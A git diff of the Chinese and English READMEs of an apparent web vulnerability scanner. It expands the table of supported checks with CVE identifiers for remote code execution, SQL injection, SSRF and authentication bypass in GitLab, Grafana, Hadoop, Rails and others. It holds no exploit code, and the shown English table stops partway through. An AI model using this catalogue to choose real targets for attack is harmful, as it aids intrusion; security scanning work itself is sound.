diff --git a/README.md b/README.md
index 7ef23a1..eb805eb 100644
--- a/README.md
+++ b/README.md
@@ -6,108 +6,126 @@ * 如果有什么想法、建议或者遇到了BUG, 都可以issues **目前支持扫描的web应用程序有:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
 <details>
 <summary><strong>目前支持扫描的web漏洞有: [点击展开]</strong></summary>
 ```
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 |
-| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 |
-| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 |
-| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 |
-| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
-| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Discuz | wooyun-2010-080723 | RCE | GET | 全局变量防御绕过RCE |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | debug page XSS跨站脚本攻击 |
-| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 |
-| Django | CVE-2019-14234 | SQLinject | GET | JSONfield SQL注入 |
-| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 |
-| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Drupal | CVE-2014-3704 | SQLinject | POST | Drupal < 7.32 Drupalgeddon SQL 注入 |
-| Drupal | CVE-2017-6920 | RCE | POST | Drupal Core 8 PECL YAML 反序列化代码执行 |
-| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 远程代码执行 |
-| Drupal | CVE-2018-7602 | RCE | POST | Drupal 远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 |
-| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 |
-| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 |
-| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 |
-| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 |
-| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <= 1.2.47 反序列化 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins 远程命令执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| mongo-express | CVE-2019-10758 | RCE | POST | 未授权远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Nodejs | CVE-2017-14849 | FileRead | GET | Node.js目录穿越 |
-| Nodejs | CVE-2021-21315 | RCE | GET | Node.js命令执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED 任意文件读取 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc 任意文件上传 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 |
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 |
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic 权限验证绕过 |
-| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic 未授权命令执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth 远程代码执行 |
-| Webmin | CVE-2019-15642 | RCE | POST | Webmin 远程代码执行 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 |
-| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 |
-+----------------------+--------------------+--------------+----------+-------------------------------------------------------------------------+
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Target | Vul_id | Type | Description |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | 阿里巴巴Druid未授权访问 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | 阿里巴巴Nacos未授权访问 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | Airflow身份验证绕过 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX默认密钥 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | Flink目录遍历 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager 未授权访问 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/任意文件读取 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-005 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-007 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-008 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-009 | RCE | Struts2远程代码执行 |
+| Apache Struts2 | S2-012 | RCE | Struts2远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT方法任意文件写入 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | AppWeb身份认证绕过 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence任意文件包含 |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence路径遍历和命令执行 |
+| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
+| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | 思科ASA/FTD XSS跨站脚本攻击 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Discuz | wooyun-2010-080723 | RCE | 全局变量防御绕过RCE |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | debug page XSS跨站脚本攻击 |
+| Django | CVE-2018-14574 | Redirect | CommonMiddleware url重定向 |
+| Django | CVE-2019-14234 | SQLinject | JSONfield SQL注入 |
+| Django | CVE-2020-9402 | SQLinject | GIS SQL注入 |
+| Django | CVE-2021-35042 | SQLinject | QuerySet.order_by SQL注入 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQL 注入 |
+| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML 反序列化代码执行 |
+| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 远程代码执行 |
+| Drupal | CVE-2018-7602 | RCE | Drupal 远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch命令执行 |
+| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy 沙盒绕过&&代码执行 |
+| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch 目录穿越 |
+| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch 目录穿越 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP远程代码执行 |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP身份认证绕过 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 反序列化 |
+| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <= 1.2.47 反序列化 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Gitea | None | unAuth | Gitea 1.4.0 未授权访问 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth 远程命令执行 |
+| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API未授权 SSRF |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x 插件模块路径遍历 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Jenkins | CVE-2018-1000861 | RCE | jenkins 远程命令执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | 使用request_uri调用未经验证的URL |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Landray | CNVD-2021-28277 | FileRead/SSRF| 蓝凌OA 任意文件读取/SSRF |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| mongo-express | CVE-2019-10758 | RCE | 未授权远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Nodejs | CVE-2017-14849 | FileRead | Node.js目录穿越 |
+| Nodejs | CVE-2021-21315 | RCE | Node.js命令执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| NodeRED | CVE-2021-3223 | FileRead | Node-RED 任意文件读取 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails 路径遍历 |
+| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails 任意文件读取 |
+| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails 命令执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc 任意文件上传 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | Spring Cloud目录遍历 |
+| Spring | CVE-2021-21234 | FileRead | Spring Boot目录遍历 |
+| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl远程代码执行 |
+| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL远程代码执行 |
+| Spring | CVE-2022-22965 | RCE | Spring Framework远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x 远程代码执行 |
+| ThinkPHP | CNVD-2018-24942 | RCE | 未开启强制路由导致RCE |
+| ThinkPHP | CNNVD-201901-445 | RCE | 核心类Request远程代码执行 |
+| ThinkPHP | None | RCE | ThinkPHP2.x 远程代码执行 |
+| ThinkPHP | None | SQLinject | ThinkPHP5 ids参数SQL注入 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Ueditor | None | SSRF | Ueditor编辑器SSRF |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic 服务端请求伪造 |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder反序列化 |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async反序列化 |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic 权限验证绕过 |
+| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic 未授权命令执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth 远程代码执行 |
+| Webmin | CVE-2019-15642 | RCE | Webmin 远程代码执行 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
+| Yonyou | CNNVD-201610-923 | SQLinject | 用友GRP-U8 Proxy SQL注入 |
+| Yonyou | CNVD-2021-30167 | RCE | 用友NC BeanShell远程命令执行 |
+| Yonyou | None | FileRead | 用友ERP-NC NCFindWeb目录遍历 |
+| Yonyou | None | DSinfo | 用友U8 OA getSessionList.jsp 敏感信息泄漏 |
+| Yonyou | None | SQLinject | 用友U8 OA test.jsp SQL注入 |
++----------------------+--------------------+--------------+--------------------------------------------------------------------+
 ```
 </details>
diff --git a/README_en-us.md b/README_en-us.md
index 8ba3b09..b67389b 100644
--- a/README_en-us.md
+++ b/README_en-us.md
@@ -5,108 +5,126 @@ * If you have any ideas, suggestions, or bugs, you can issue **Web applications that currently support scanning:**
-> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
+> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
 <details>
 <summary><strong>The current web vulnerabilities that support scanning: [Click on]</strong></summary>
 ```
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Target | Vul_id | Type | Method | Description |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution |
-| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution |
-| Apache Struts2 | S2-012 | RCE | GET | Struts2 Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include |
-| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE |
-| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection |
-| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Discuz | wooyun-2010-080723 | RCE | GET | Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS |
-| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect |
-| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject |
-| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject |
-| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Drupal | CVE-2014-3704 | SQLinject | POST | Drupal < 7.32 Drupalgeddon SQLinject |
-| Drupal | CVE-2017-6920 | RCE | POST | Drupal Core 8 PECL YAML Remote code execution |
-| Drupal | CVE-2018-7600 | RCE | POST | Drupal Drupalgeddon 2 Remote code execution |
-| Drupal | CVE-2018-7602 | RCE | POST | Drupal Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution |
-| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE |
-| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal |
-| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution |
-| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization |
-| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | POST | jenkins Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| mongo-express | CVE-2019-10758 | RCE | POST | Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Nodejs | CVE-2017-14849 | FileRead | GET | Node.js Directory traversal |
-| Nodejs | CVE-2021-21315 | RCE | GET | Node.js Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | GET | Node-RED Directory traversal |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | POST | ShowDoc writes to any file |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal |
-| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal |
-| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution |
-| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution |
-| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution |
-| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution |
-| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution |
-| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution |
-| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Ueditor | None | SSRF | GET | Ueditor SSRF |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass |
-| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | POST | Webmin Pre-Auth Remote code execution |
-| Webmin | CVE-2019-15642 | RCE | POST | Webmin Remote code execution |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
-| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution |
-| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal |
-+----------------------+--------------------+--------------+----------+------------------------------------------------------------+
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Target | Vul_id | Type | Description |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | Alibaba Druid unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | Alibaba Nacos unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | Airflow Authentication bypass |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX default access token |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | Flink Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Struts2 | S2-001 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-005 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-007 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-008 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-009 | RCE | Struts2 Remote code execution |
+| Apache Struts2 | S2-012 | RCE | Struts2 Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | Put method writes to any file |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | AppWeb Authentication bypass |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence any file include |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence Directory traversal && RCE |
+| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence OGNL expression command injection |
+| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | Cisco ASA/FTD XSS |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Discuz | wooyun-2010-080723 | RCE | Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | Django debug page XSS |
+| Django | CVE-2018-14574 | Redirect | Django CommonMiddleware URL Redirect |
+| Django | CVE-2019-14234 | SQLinject | Django JSONfield SQLinject |
+| Django | CVE-2020-9402 | SQLinject | Django GIS SQLinject |
+| Django | CVE-2021-35042 | SQLinject | Django QuerySet.order_by SQLinject |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQLinject |
+| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML Remote code execution |
+| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 Remote code execution |
+| Drupal | CVE-2018-7602 | RCE | Drupal Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch Remote code execution |
+| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy Sandbox to bypass && RCE |
+| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch Directory traversal |
+| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP Remote code execution |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP Authentication bypass |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 deSerialization |
